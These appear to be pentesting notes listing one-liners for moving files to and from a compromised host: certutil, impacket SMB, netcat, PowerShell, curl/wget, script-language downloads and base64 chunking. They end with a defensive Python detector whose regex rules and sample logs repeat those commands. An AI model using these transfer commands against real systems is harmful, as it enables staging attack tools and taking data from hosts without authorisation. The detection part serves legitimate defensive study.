After gaining access to a server you usually need to upload tools to it or download files from it. Different scenarios (network environments) call for different file transfer tools, and the same tools are useful in practice labs. Here is a brief record.
- windows (certutil)
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
- impacket
Use the impacket-smbserver tool to host a share (an SMB server) from the current directory:
sudo impacket-smbserver <SHARE> ./
By default the server speaks only SMB1, so newer clients fail with a protocol error; add SMB2 support:
sudo impacket-smbserver <SHARE> . -smb2support
The -smb2support option enables the SMB2 protocol, so clients that speak SMB2 can connect to the share.
If the client's security policy still blocks access to the share over SMB2 (unauthenticated guest access is refused), a username and password need to be set:
sudo impacket-smbserver SHARE ./ -smb2support -username lca -password abc+123
- python (http server)
python -m http.server <port>
- nc
On the VPS (either form):
cat user.txt | nc -l 1234
nc -l 1234 < user.txt
On the target machine:
nc <vps_ip> 1234 > user.txt
Note: in testing, once the connection is established the target machine only receives the complete file after ctrl+c is pressed on the VPS side; otherwise the transfer just hangs.
- powershell
$p = New-Object System.Net.WebClient;$p.DownloadFile("http://1.1.1.1:8000/user.txt","C:\Users\lca\Desktop\user.txt");
- wget
wget http://1.1.1.1/user.txt -O C:\Users\lca\Desktop\user.txt
- curl
curl http://1.1.1.1:8000/user.txt -o C:\Users\lca\Desktop\user.txt
- perl
perl -e "use LWP::Simple; getstore('http://1.1.1.1/user.txt', '/tmp/user.txt');"
- python (download)
python -c "import urllib.request;urllib.request.urlretrieve('http://1.1.1.1/user.txt', '/tmp/user.txt')"
- ruby
ruby -ropen-uri -e "open('/tmp/user3.txt', 'wb') { |file| file << URI.open('http://1.1.1.1:8000/user.txt').read }"
- php
php -r "file_put_contents('/tmp/user4.txt', file_get_contents('http://1.1.1.1:8000/user.txt'));"
Note: sometimes, when the file to be downloaded is an exe or jar, it is easier to base64-encode it first and decode the transmitted text back into the binary afterwards. If there is a size limit, the encoded text can also be transmitted in chunks.
# Encoding (macOS base64 syntax; with GNU coreutils use: base64 xxx.jar > out.txt)
base64 -i xxx.jar > out.txt
# Decoding (with GNU coreutils use: base64 -d out.txt > 1.jar)
base64 --decode -i out.txt -o 1.jar
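Seen from the defending side, every one-liner above is a process-creation event worth alerting on. The following is an added example (not part of these notes) in Python that runs a few coarse rules over constructed sample log lines, one per download method listed here, and escalates a downloader spawned by an Office application; the host|user|parent|command-line format and all sample values are assumptions.

```python
import re

# Constructed sample of process-creation events (not real telemetry), one per line:
# host|user|parent_image|command_line
SAMPLE_EVENTS = """\
ws01|alice|explorer.exe|certutil -urlcache -split -f http://10.0.0.5/tool.exe tool.exe
ws02|svc_build|cmd.exe|certutil -hashfile build.zip SHA256
ws01|alice|winword.exe|powershell -c $p=New-Object System.Net.WebClient;$p.DownloadFile("http://10.0.0.5:8000/u.txt","C:\\Users\\alice\\u.txt")
srv01|www-data|sh|python -c "import urllib.request;urllib.request.urlretrieve('http://10.0.0.5/u.txt', '/tmp/u.txt')"
srv01|www-data|sh|php -r "file_put_contents('/tmp/u4.txt', file_get_contents('http://10.0.0.5:8000/u.txt'));"
srv02|deploy|bash|nc 10.0.0.5 1234 > user.txt
srv02|deploy|bash|base64 --decode -i out.txt -o 1.jar
srv03|backup|bash|base64 --decode -i notes.b64 -o notes.txt
""".splitlines()
# One regex per download/transfer pattern from the notes above; coarse triage
# signals only (certutil -hashfile or decoding a .txt file must not fire).
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*-f\s+https?://", re.I)),
    ("powershell_webclient_downloadfile",
     re.compile(r"Net\.WebClient.*\.DownloadFile\(", re.I)),
    ("script_interpreter_http_fetch",
     re.compile(r"(urllib\.request\.urlretrieve|LWP::Simple|URI\.open|file_get_contents)"
                r"\(?.*https?://", re.I)),
    ("netcat_redirect_to_file",
     re.compile(r"\b(nc|ncat|netcat)\s+\S+\s+\d+\s*>\s*\S+")),
    ("base64_decode_to_executable",
     re.compile(r"base64\s+(--decode|-d)\b.*\.(exe|jar)\b", re.I)),
]
# A downloader spawned by an Office application is escalated (assumed parent names).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def parse_event(line):
    host, user, parent, cmd = line.split("|", 3)
    return {"host": host, "user": user, "parent": parent.lower(), "cmd": cmd}

def scan_events(lines):
    """Return one finding dict per (event, rule) match, in input order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for rule, pattern in RULES:
            if pattern.search(ev["cmd"]):
                severity = "high" if ev["parent"] in OFFICE_PARENTS else "medium"
                findings.append({**ev, "rule": rule, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['user']} {f['rule']}: {f['cmd']}")
```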